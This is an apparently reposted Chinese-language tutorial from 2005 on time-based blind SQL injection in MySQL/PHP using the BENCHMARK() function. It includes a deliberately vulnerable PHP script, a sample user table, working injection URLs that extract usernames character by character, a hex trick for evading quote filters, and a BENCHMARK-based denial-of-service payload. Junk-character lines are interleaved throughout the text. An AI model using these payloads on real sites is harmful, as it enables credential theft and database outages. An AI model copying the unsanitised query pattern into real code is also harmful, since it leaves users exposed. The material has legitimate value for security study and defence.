MYSQL中BENCHMARK函数的利用

admin

MYSQL中BENCHMARK函数的利用
本文作者：SuperHei
$ B6 P2 x$ \6 V文章性质：原创
6 B+ p, \+ v/ z发布日期：2005-01-02
完成日期：2004-07-09
第一部
/ m+ c& M# o* x. i, {! G; V# I6 m
$ }' |3 b' j: d2 y" ^利用时间推延进行注射---BENCHMARK函数在注射中的利用

! f( M8 ~) H# `! f3 a一.前言/思路
- j. ~& s2 y! k4 j& c
　　如果你看了angel的《SQL Injection with MySQL》一文，你有会发现一般的mysql+php的注射都是通过返回错误信息，和union联合查询替换原来查询语句中的字段而直接输出敏感信息，但是有的时候，主机设置为不显示错误信息：display_errors = Off 而且有的代码中sql查询后只是简单的对查询结果进行判断，而不要求输出查询结果，我们用上面的办法注射将一无所获。我们可以采用时间推延来进行判断注射了。

　　本技术的主要思路：通过在构造的语句用加入执行时间推延的函数，如果我们提交的判断是正确的，那么mysql查询时间就出现推延，如果提交的判断是正确，将不会执行时间推延的函数，查询语句将不会出现推延。这样我们就可以进行判断注射。

  y2 p$ I4 D/ U/ E5 E二.关于BENCHMARK函数

　　在MySQL参考手册里可以看到如下描叙：


8 X+ \- ^7 ?* m) ^, x--------------------------------------------------------------------------------
" S) o8 c8 z+ u% n9 g
BENCHMARK(count,expr)
BENCHMARK()函数重复countTimes次执行表达式expr，它可以用于计时MySQL处理表达式有多快。结果值总是0。意欲用于mysql客户，它报告查询的执行时间。
9 j3 J3 _+ x! |  U) f$ p% @8 J7 s$ @mysql> select BENCHMARK(1000000,encode("hello","goodbye"));
+----------------------------------------------+
  [! f: R; s; k| BENCHMARK(1000000,encode("hello","goodbye")) |
+----------------------------------------------+
| 0 |
+----------------------------------------------+
/ D& s0 \' @, k1 ^$ L5 S% A1 row in set (4.74 sec)
% W8 p. {% W. q9 Z# T" E
报告的时间是客户端的经过时间，不是在服务器端的CPU时间。执行BENCHMARK()若干次可能是明智的，并且注意服务器机器的负载有多重来解释结果。

6 L/ h$ n. U3 |& O9 Q! S
  N+ ?5 b% N, N' Z--------------------------------------------------------------------------------
6 Q3 N4 ^8 Y2 q1 Y! F/ F9 r
6 B' Z+ U% m1 c8 u8 e　　只要我们把参数count 设置大点，那么那执行的时间就会变长。下面我们看看在mysql里执行的效果：
: D8 o) _& E; J, x9 w$ [
+ V( _) y' g: l" @- s! z7 |( _; {mysql> select md5( 'test' );
+----------------------------------+
| md5( 'test' ) |
+----------------------------------+
' R- ]2 W' R# }3 d/ X# G9 ^| 098f6bcd4621d373cade4e832627b4f6 |
+----------------------------------+
0 J& ]& e. D. k( y  }2 d1 row in set (0.00 sec) 〈-----------执行时间为0.00 sec

mysql> select benchmark( 500000, md5( 'test' ) );
+------------------------------------+
| benchmark( 500000, md5( 'test' ) ) |
: _* u' _5 x  }+ k( A  i+------------------------------------+
| 0 |
+------------------------------------+
* R# A  q: _- v8 E5 d0 f1 row in set (6.55 sec) 〈------------执行时间为6.55 sec

4 A, g; O+ ?5 k
　　由此可以看出使用benchmark执行500000次的时间明显比正常执行时间延长了。

三.具体例子
8 U6 x) H( ?2 L0 X- u
　　首先我们看个简单的php代码：

< ?php
$servername = "localhost";
$dbusername = "root";
# U  _8 z8 M$ e- v$ R" a. E$dbpassword = "";
1 a& X# d! S8 J, T! c$dbname = "injection";
# u0 u/ c  P6 K- {0 s
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$ Y) B1 p: J# K2 z0 _& e' s. |0 v
$sql = "SELECT * FROM article WHERE articleid=$id";
$result = mysql_db_query($dbname,$sql);
  s9 R" O! G/ K" ?; b$row = mysql_fetch_array($result);

$ D/ x! `/ V' F' `4 K; Iif (!$row)
6 |% x, _4 D+ o{
: W) C8 h" m0 E: p( o0 D$ nexit;
+ j4 T$ P  a! u" \}
7 D3 M; b8 @% i6 N. U?>
! S+ q2 L1 b0 M" D2 G2 o' n
/ Z- X- a1 |+ f2 }0 V
　　数据库injection结构和内容如下：
5 g6 _- Q0 n. ^7 i) F: a
6 j- G: r0 Z2 t0 Z# 数据库 : `injection`
#

# --------------------------------------------------------
' e+ |1 o2 D% ?$ h; n3 y
#
# 表的结构 `article`
#
2 f$ S* ], ~- y2 n4 Q3 k& m
CREATE TABLE `article` (
: r6 C3 a- B2 y. j9 `  W`articleid` int(11) NOT NULL auto_increment,
0 U4 e/ q, k+ O. R1 X`title` varchar(100) NOT NULL default '',
`content` text NOT NULL,
PRIMARY KEY (`articleid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
# 导出表中的数据 `article`
#

INSERT INTO `article` VALUES (1, '我是一个不爱读书的孩子', '中国的教育制度真是他妈的落后！如果我当教育部长。我要把所有老师都解雇！操～');
4 \1 Y3 M( ?* s, h; |7 D* Q2 y( n& dINSERT INTO `article` VALUES (2, '我恨死你', '我恨死你了，你是什么东西啊');

# --------------------------------------------------------
1 V! T" `" I6 f
#
  p2 z# i9 U" l: l% Y8 E/ D. ?& D# 表的结构 `user`
6 V* `# T& D: P' X* J6 ]0 Z#

CREATE TABLE `user` (
`userid` int(11) NOT NULL auto_increment,
`username` varchar(20) NOT NULL default '',
0 {1 E$ ]4 `' b, L`password` varchar(20) NOT NULL default '',
PRIMARY KEY (`userid`)
) TYPE=MyISAM AUTO_INCREMENT=3 ;

#
5 E$ o3 V5 G5 x+ \! l# 导出表中的数据 `user`
( a8 O) S& t0 x; m: z! B#
1 |# O5 p4 t# l+ @
INSERT INTO `user` VALUES (1, 'angel', 'mypass');
! D3 D, p( `5 Q/ lINSERT INTO `user` VALUES (2, '4ngel', 'mypass2');
$ R/ A6 f1 P' r# [. b

　　代码只是对查询结果进行简单的判断是否存在，假设我们已经设置display_errors=Off。我们这里就没办法利用union select的替换直接输出敏感信息(ps:这里不是说我们不利用union，因为在mysql中不支持子查询)或通过错误消息返回不同来判断注射了。我们利用union联合查询插入BENCHMARK函数语句来进行判断注射：

id=1 union select 1,benchmark(500000,md5('test')),1 from user where userid=1 and ord(substring(username,1,1))=97 /*
. [  q" w9 }$ A- n
) [$ O* s5 T/ O
　　上面语句可以猜userid为1的用户名的第一位字母的ascii码值是是否为97，如果是97，上面的查询将由于benchmark作用而延时。如果不为97，将不回出现延时，这样我们最终可以猜出管理员的用户名和密码了。 大家注意，这里有一个小技巧：在benchmark(500000,md5('test'))中我们使用了'号， 这样是很危险的，因为管理员随便设置下 就可以过滤使注射失败，我们这里test可以是用其他进制表示，如16进制。最终构造如下：
7 M. V4 M/ h! C4 @7 G
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,benchmark(500000,md5(0x41)),1%20from%20user%20where%20userid=1%20and%20ord(substring(username,1,1))=97%20/*
. s0 Q- z( s' b% f& I1 u; I0 O3 S( E

- ~. d' o1 @( J8 d1 n$ @& [% j: w0 x　　执行速度很慢，得到userid为1的用户名的第一位字母的ascii码值是是为97。
* I% J6 L: q* L  \  D
! U7 O) M+ L# f  u　　注意：我们在使用union select事必须知道原来语句查询表里的字段数，以往我们是根据错误消息来判断，我们在union select 1,1,1我们不停的增加1 如果字段数正确将正常返回不会出现错误，而现在不可以使用这个方法了，那我们可以利用benchmark(),我们这样构造 union select benchmark(500000,md5(0x41)) 1,1 我们在增加1的，当字段数正确时就回执行benchmark()出现延时，这样我们就可以判断字段数了。

第二部
4 z) w6 u  O5 ]
1 d$ D- L) J* L9 ]利用BENCHMARK函数进行ddos攻击
+ Z; `+ S* D; @# b4 r. ^! s! L& _
　　其实思路很简单：在BENCHMARK(count,expr) 中 我们只要设置count 就是执行次数足够大的话，就可以造成dos攻击了，如果我们用代理或其他同时提交，就是ddos攻击，估计数据库很快就会挂了。不过前提还是要求可以注射。语句：
0 _" z5 S( f  y! S8 P
http://127.0.0.1/test/test/show.php?id=1%20union%20select%201,1,benchmark(99999999,md5(0x41))


小结

　　本文主要思路来自http://www.ngssoftware.com/papers/HackproofingMySQL.pdf，其实关于利用时间差进行注射在mssql注射里早有应用，只是所利用的函数不同而已（见http://www.ngssoftware.com/papers/more_advanced_sql_injection.pdf）。关于mysql+php一般注射的可以参考angel的文章《SQL Injection with MySQL》。

# [7 w+ y6 H: r) d2 x  
* }$ c* z; u# u3 I6 {. c  E